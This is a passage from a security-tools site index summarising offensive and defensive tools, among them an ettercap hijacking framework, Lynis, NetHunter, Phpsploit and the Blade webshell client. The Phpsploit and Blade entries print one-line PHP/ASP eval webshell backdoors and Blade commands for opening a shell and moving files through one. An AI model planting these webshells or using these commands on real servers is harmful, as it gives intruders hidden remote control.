hash](https://tools.cyberkendra.com/2017/08/hash-buster-scraps-online-hash-crackers-to-find-cleartext-of-a-hash.html): Hash Buster - scraps online hash crackers to find cleartext of a hash - [InforFinder – tool to collect information of any domains pointing at some server](https://tools.cyberkendra.com/2017/08/inforfinder-tool-to-collect-information-of-any-domains-pointing-at-some-server.html): InforFinder - tool to collect information of any domains pointing at some server. - [Hijacker-Wireless Auditing Tool for Android](https://tools.cyberkendra.com/2017/01/hijacker-wireless-auditing-tool-for-android.html): Hijacker is a Graphical User Interface for the wireless auditing tools airodump-ng, aireplay-ng and mdk3. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses. This application requires an android device with a wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 (and BCM4358 (although injection is not yet supported so no aireplay or mdk)) chipset will work with Nexmon . Also, devices that use BCM4330 can use bcmon . An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable.The required tools are included in the app. To install them go to Settings and click "Install Tools". This will install everything in the directory you select. If you have already installed them, you don't have to do anything. You can also have them at any directory you want and set the directories in Settings, though this might cause the wireless tools not being found by the aircrack-ng suite. The Nexmon driver and management utility is also included.Root is also necessary, as these tools need root to work. If you don't grant root permissions to it, it hangs... for some reason... don't know why...Features: - [ZoomEye- A Cyber Space Search Engine](https://tools.cyberkendra.com/2017/01/zoomeye-a-cyber-space-search-engine.html): ZoomEye is another cool web search engine, where users can search for the connected devices, ports and other things which helps to understand the network infrastructure for Pentest. - [Morpheus – automated ettercap TCP/IP Hijacking tool](https://tools.cyberkendra.com/2016/12/morpheus-automated-ettercap-tcp-ip-hijacking-tool.html): Version release : v1.7-Alpha Author : pedro ubuntu Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS Suspicious-Shell-Activity (SSA) RedTeam develop @2016 LEGAL DISCLAMER The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent its illegal and punished by law. Framework description morpheus framework automates tcp/udp packet manipulation tasks by using etter filters to manipulate target requests/responses under MitM attacks replacing the tcp/udp packet contents by our contents befor forward the packet back to the target host... workflow: 1º - attacker -> arp poison local lan (mitm) 2º - target -> requests webpage from network (wan) 3º - attacker -> modifies webpage response (contents) 4º - attacker -> modified packet its forward back to target host morpheus ships with some pre-configurated filters but it will allow users to improve them when lunching the attack (morpheus scripting console). In the end of the attack morpheus will revert the filter back to is default stage, this will allow users to improve filters at running time without the fear of messing with filter command syntax and spoil the filter. "Perfect for scripting fans to safely test new concepts"... What can we acomplish by using filters? morpheus ships with a collection of etter filters writen be me to acomplish various tasks: replacing images in webpages, replace text in webpages, inject payloads using html <form> tag, denial-of-service attacks (drop,kill packets from source), https/ssh downgrade attacks, redirect target browser traffic to another domain and gives you the ability to build compile your filter from scratch and lunch it through morpheus framework (option W). "filters can be extended using browser languages like: javascript,css,flash,etc"... In this example we are using " HTML tag" to inject an rediretion url in target request In this example we are using 'CSS3' to trigger webpage 180º rotation  Framework limitations 1º - morpheus will fail if target system its protected againt arp poison atacks 2º - downgrade attacks will fail if browser target as installed only-https addon's 3º - target system sometimes needs to clear netcache for arp poison to be effective 4º - many attacks described in morpheus may be droped by target HSTS detection sys. 5º - incorrect number of token (///) in TARGET !!  morpheus by default will run ettercap using IPv6 (USE_IPV6=ACTIVE) like its previous configurated into the 'settings' file, if you are reciving this error edit settings file befor runing morpheus and set (USE_IPV6=DISABLED) to force ettercap to use IPV4 6º - morpheus needs ettercap to be exeDocuted with higth privileges (uid 0 | gid 0).  correct ettercap configuration display (running as Admin without ssl disectors active)  By default morpheus (at startup) will replace the original etter.conf/etter.dns files provided by ettercap, at framework exit morpheus will revert files to is original state.. Dependencies ettercap, nmap, apache2, zenity Credits alor&naga (ettercap framework) | fyodor (nmap framework) filters: irongeek (replace img) | seannicholls (rotate 180º) Most of the filters in morpheus framework have been writen be me except the ones described above, but this project will contemplate new external addictions (authors) also new examples can be found editing ettercap's etter.filter.examples file that will help us write new ones. Download - [Lynis 2.2.0 – Security Auditing Tool for Unix/Linux Systems](https://tools.cyberkendra.com/2016/03/lynis-2-2-0-security-auditing-tool-for-unix-linux-systems.html): Lynis is an open source security auditing tool. Commonly used by system administrators, security professionals and auditors, to evaluate the security defenses of their Linux/Unix based systems. It runs on the host itself, so it can perform very extensive security scans. Supported operating systems The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including: AIX FreeBSD HP-UX Linux Mac OS NetBSD OpenBSD Solaris and others It even runs on systems like the Raspberry Pi and several storage devices! No installation required The tool is very flexible and easy to use. It is one of the few tools, in which installation is optional. Just place it on the system, give it a command like "audit system", and it will run. It is written in shell script and released as open source software (GPL). How it works Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report. Steps Determine operating system Search for available tools and utilities Check for Lynis update Run tests from enabled plugins Run security tests per category Report status of security scan During the scan, technical details about the scan are stored in a log file. At the same time findings (warnings, suggestions, data collection), are stored in a report file. Opportunistic scanning Lynis scanning is opportunistic: it uses what it can find. For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well. In-depth security scans By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same! Use cases Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include: Security auditing Compliance testing (e.g. PCI, HIPAA, SOx) Vulnerability detection and scanning System hardening Resources used for testing Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool. Best practices CIS NIST NSA OpenSCAP data Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat) Parameters --auditor "Given name Surname" Assign an auditor name to the audit (report) --checkall -c Start the check --check-update Check if Lynis is up-to-date --cronjob Run Lynis as cronjob (includes -c -Q) --help -h Shows valid parameters --manpage View man page --nocolors Do not use any colors --pentest Perform a penetration test scan (non-privileged) --quick -Q Don't wait for user input, except on errors --quiet Only show warnings (includes --quick, but doesn't wait) --reverse-colors Use a different color scheme for lighter backgrounds --version -V Check program version (and quit) Changelog Lynis 2.2.0 = Lynis 2.2.0 (2016-03-18) = We are proud to present this new release of Lynis. It is a major upgrade, and the result of many months of work. This version includes new features and tests, and many small enhancements. We encourage all to test and upgrade to this latest release. * Highlights ------------ The biggest change in this release is the optimization of several functions. It allows for better detection, and dealing with the quirks, of every single operating system. Some functions were fortified to handle unexcepted results better, like missing a particular binary, or not returning the hostname. This release also enables tests to be shorter, by adding new functions. Some functions were renamed or slightly changed, to provide more value to the tooling. Another big change in this release is a wide set of optimizations and quality testing. Outdated pieces were removed, or rewritten, to support features seen in newer distributions. In the area of compliance, adjustments have been made to start supporting more in-depth testing for this. Ideal for companies who have a particular compliance need, or want to test and enforce the system hardening levels of their systems. Last but not least, many small changes make this software easier to use. On our website we added new guides to provide help and support. We like to thank our contributors, in particular Kamil Boratyński, Steve Bosek, and Eric Light. Their contributions helped us greatly shaping this release. Download Lynis - [Mobile-Security-Framework (MobSF) for Android and iOS](https://tools.cyberkendra.com/2016/03/mobile-security-framework-mobsf-for-android-and-ios.html): Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. It can be used for effective and fast security analysis of Android and iOS Applications and supports both binaries (APK & IPA) and zipped source code. MobSF can also perform Web API Security testing with it's API Fuzzer that can do Information Gathering, analyze Security Headers, identify Mobile API specific vulnerabilities like XXE, SSRF, Path Traversal, IDOR, and other logical issues related to Session and API Rate Limiting. Download Here - [Project Arsenal X – As HackTheGame But Real](https://tools.cyberkendra.com/2016/01/project-arsenal-x-as-hackthegame-but-real.html): Project Arsenal X  New version of my Arsenal X written in Delphi with the following options:  Gmail Inbox  Whois Client  Table  Downloader  Get IP  Locate IP  K0bra SQLI Scanner  Crack multiple hashes  Search admin panel  Port Scanner  Multi Cracker with support for FTP, TELNET, POP3  Execution of commands in the console An video :  Download Project ArsenalX - [Kali NetHunter 3.0 – Android Mobile Penetration Testing Platform](https://tools.cyberkendra.com/2016/01/kali-nethunter-3-0-android-mobile-penetration-testing-platform.html): What’s New in Kali NetHunter 3.0     NetHunter Android Application Rewrite The NetHunter Android application has been totally redone and has become much more “application centric”. Many new features and attacks have been added, not to mention a whole bunch of community-driven bug fixes. The NetHunter application has finally reached maturity and is now a really viable tool that helps manage complex attacks. In addition, the application now allows you to manage your Kali chroot independently, including rebuilding and deleting the chroot as needed. You can also choose to install individual metapackages in your chroot, although the default selected kali-nethunter metapackage should include all the bare necessities.     Android Lollipop and Marshmallow Support Yes, you heard right. NetHunter now supports Marshmallow (Android AOSP 6.x) on applicable devices – although we’re not necessarily fans of the “latest is best” philosophy. Our favourite device continues to be the OnePlus One phone due to the combined benefits of size, CPU/RAM resources, as well as Y-Cable charging support.     New Build Scripts, Easier Integration for New Devices Our rewrite also included the code that generates the images, completely porting it to Python and optimizing the build time significantly. The build process can now build small NetHunter images (~70MB) that do not include a built-in Kali chroot – allowing you do download a chroot later via the Android application. We’ve also made it much easier to build ports for new devices that NetHunter can run on and we’ve already seen a couple of interesting PRs regarding Galaxy device support…     Fabulous NetHunter Documentation We might be somewhat biased regarding our documentation, and perhaps it’s not “fabulous” but just “good”… but still, it’s definitely much better than it was before and can be found in the form of the NetHunter Github Wiki. We’ve included topics such as downloading, building and installing NetHunter, as well as a quick overview of each of the NetHunter Attacks and Features.     NetHunter Linux Root Toolkit Installer We’ve got a new official NetHunter installer that runs natively on Linux or OSX. The installer is made from a set of Bash scripts which you can use to unlock, flash to stock and install the NetHunter image to supported OnePlus One or Nexus devices. Now you can download the following version of Net Hunter image from the given link below: Image Name DownloadSizeVersionSHA1Sum OnePlus One CM 12.1ZIP or Trnt0.6G3.0d8e757a3f5553aa344a253c8741f645d41739bf0 Nexus 4 LollipopZIP or Trnt0.6G3.0df19d9444949e0cc77b048f67ea9c40653f34051 Nexus 5 MarshmallowZIP or Trnt0.6G3.05001371e3cf97863b37eaf6bfff6157a56423a93 Nexus 5 LollipopZIP or Trnt0.6G3.05e4ebac1666fe75e5824e7bb790f17164ff0a103 Nexus 6 MarshmallowZIP or Trnt0.6G3.066181a752a5a340083976690e797c77c0ee93465 Nexus 6 LollipopZIP or Trnt0.6G3.08839875afbea3d402a4761322871d98a36d1a49b Nexus 7 2012 LollipopZIP or Trnt0.6G3.02342059e2de1d75065741743aa1072c39cdbf58a Nexus 7 2013 MarshmallowZIP or Trnt0.6G3.0eb29d810d5f5024faebe3ad39868d56c90f19a87 Nexus 7 2013 LollipopZIP or Trnt0.6G3.05ca299a5778cd5bc906852cd693c81ef6d0db120 Nexus 10 MarshmallowZIP or Trnt0.6G3.0f008eaa7c8321a894464e7f52744a20763fef734 Nexus 9 LollipopZIP or Trnt0.6G3.0d144d0acb44e93c1a03538d817df3c606ffe6b44 Nexus 10 LollipopZIP or Trnt0.6G3.0cf21f15800ee6 - [Phpsploit – Stealth Post-Exploitation Framework](https://tools.cyberkendra.com/2016/01/phpsploit-stealth-post-exploitation-framework.html): PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalationpurposes. Overview The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tinypolymorphic backdoor : <? @eval($_SERVER) ?> Features Efficient : More than 20 plugins to automate post-exploitation tasks  Run commands and browse filesystem, bypassing PHP security restrictions Upload/Download files between client and target Edit remote files through local text editor Run SQL console on target system Spawn reverse TCP shells Stealth : The framework is made by paranoids, for paranoids  Nearly invisible by log analysis and NIDS signature detection Safe-mode and common PHP security restrictions bypass Communications are hidden in HTTP Headers Loaded payloads are obfuscated tobypass NIDS http/https/socks4/socks5 Proxy support Convenient : A robust interface with many crucial features  Cross-platform on both the client and the server. Powerful interface with completion and multi-command support Session saving/loading feature, with persistent history Multi-request support for large payloads (such as uploads) Provides a powerful, highly configurable settings engine Each setting, such as user-agent has apolymorphic mode Customisable environment variables for plugin interaction Provides a complete plugin development API Supported platforms GNU/Linux Mac OS X Windows (experimental) Download Phpsploit - [Joomlavs – A Black Box, Joomla Vulnerability Scanner](https://tools.cyberkendra.com/2016/01/joomlavs-a-black-box-joomla-vulnerability-scanner.html): How to use The only required option is the -u / --url option, which specifies the address to target. To do a full scan, however, the --scan-all option should also be specified, e.g. ruby joomlavs.rb -u yourjoomlatarget.com --scan-all . A full list of options can be found below:  - [Blade – A Webshell Connection Tool With Customized WAF Bypass Payloads](https://tools.cyberkendra.com/2016/01/blade-a-webshell-connection-tool-with-customized-waf-bypass-payloads.html): Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another "Chooper" supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not. Major functions Manage a web server with only one-line code on it, just like: <?php @eval($_REQUEST); ?> PHP, ASP, ASPX & JSP supported. Terminal Console provided. File management & Dadabase management. Features Cross-plaform supported (Python needed) Customizable WAF bypass payloads Compatible with Chooper's server side scripts Server side scripts examples PHP: <?php @eval($_REQUEST); ?> ASP: <%eval request("cmd")%> ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item,"unsafe");%> Usage Get a shell: python blade.py -u http://localhost/shell.php -s php -p cmd --shell Download a file: python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path local_path Upload a file: python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path Current issues Server side scripts supporting is not completed, currently only support PHP and ASP Database management function is not completed, so can not connect databases  Download Blade ## Pages - [JSON Formatter – JSON Tools](https://tools.cyberkendra.com/json-formatter-json-tools): Professional utilities for formatting, validating, and transforming JSON data - [IP Subnet Calculator](https://tools.cyberkendra.com/ip-subnet-calculator): Professional IP Subnet Calculator with AWS VPC Support - [EML to Excel or CSV File](https://tools.cyberkendra.com/eml-to-excel-or-csv-file): Professional tool for converting email files to spreadsheet format - [Income Tax Calculator 2025-26 – Old vs New Regime](https://tools.cyberkendra.com/income-tax-calculator-2025-26-old-vs-new-regime): For Individual/ HUF/ AOP/ BOI/ Artificial Juridical Person (AJP) as per section 115BAC - [Free Online Image Compressor](https://tools.cyberkendra.com/free-online-image-compressor): Reduce image file sizes by up to 90% while maintaining quality. Support for JPEG, PNG, WebP, and GIF formats. - [Image to PDF Converter](https://tools.cyberkendra.com/image-to-pdf-converter): Upload your images, customize settings, and convert to PDF instantly - [NPS Calculator](https://tools.cyberkendra.com/nps-calculator): Calculate your National Pension System returns, monthly pension, and tax benefits with our advanced calculator. Plan your secure retirement today! - [Profile Analyzer](https://tools.cyberkendra.com/profile-analyzer): Advanced OSINT username investigation across 350+ social platforms, forums, and websites - [Username Finder](https://tools.cyberkendra.com/username-finder): Advanced OSINT Tool - Search Usernames Across 400+ Social Media Platforms - [8th Pay Commission Salary Calculator](https://tools.cyberkendra.com/8th-pay-salary-calculator): Calculate Your Revised Salary - Central & State Government Employees - [Traceroute Test](https://tools.cyberkendra.com/traceroute-test): Professional network path analysis with real-time MTR data - [IP Analyzer](https://tools.cyberkendra.com/ip-analyzer): Your current public IP address - [Reverse Image Search](https://tools.cyberkendra.com/reverse-image-search): You can search for an image by uploading it with URL or typing the keyword or any word you want to explore related to images. - [JSON To Excel/CSV](https://tools.cyberkendra.com/json-to-excel-csv): Transform your JSON data into Excel and CSV formats instantly. Free, secure, and lightning-fast conversion with no file size limits. - [JSON To Tabular Converter](https://tools.cyberkendra.com/json-to-tabular-converter): Choose from Professional, Minimal, Striped, Modern, and Elegant table designs, each optimized for different use cases and aesthetics. - [JSON to LRC Conversion Tool](https://tools.cyberkendra.com/json-to-lrc-conversion-tool): { } - [Free Virus Scanner Tool](https://tools.cyberkendra.com/free-virus-scanner-tool): Upload files or scan URLs for viruses and malware using VirusTotal's comprehensive detection engines - [Data Breach Checker Tool](https://tools.cyberkendra.com/data-breach-checker-tool): Check if your email address has been compromised in data breaches using the HaveIBeenPwned database - [IMEI Calculator Tool](https://tools.cyberkendra.com/imei-calculator-tool): Calculate check digit or validate IMEI numbers using the Luhn Algorithm - [IMEI Checker Tool](https://tools.cyberkendra.com/imei-checker-tool): Enter an IMEI number to check device information and validity - [MNP Checker (Bulk)](https://tools.cyberkendra.com/mnp-checker-bulk): Check multiple mobile numbers telecom details at once - [MNP Checker (Single)](https://tools.cyberkendra.com/mnp-checker-single): Find operator, circle & plan type for any Indian mobile number - [Calculator](https://tools.cyberkendra.com/calculator) - [Blog](https://tools.cyberkendra.com/blog) - [Home](https://tools.cyberkendra.com/): A collection of fast, free, and easy-to-use tools to simplify your work, boost productivity, and get things done right from your browser.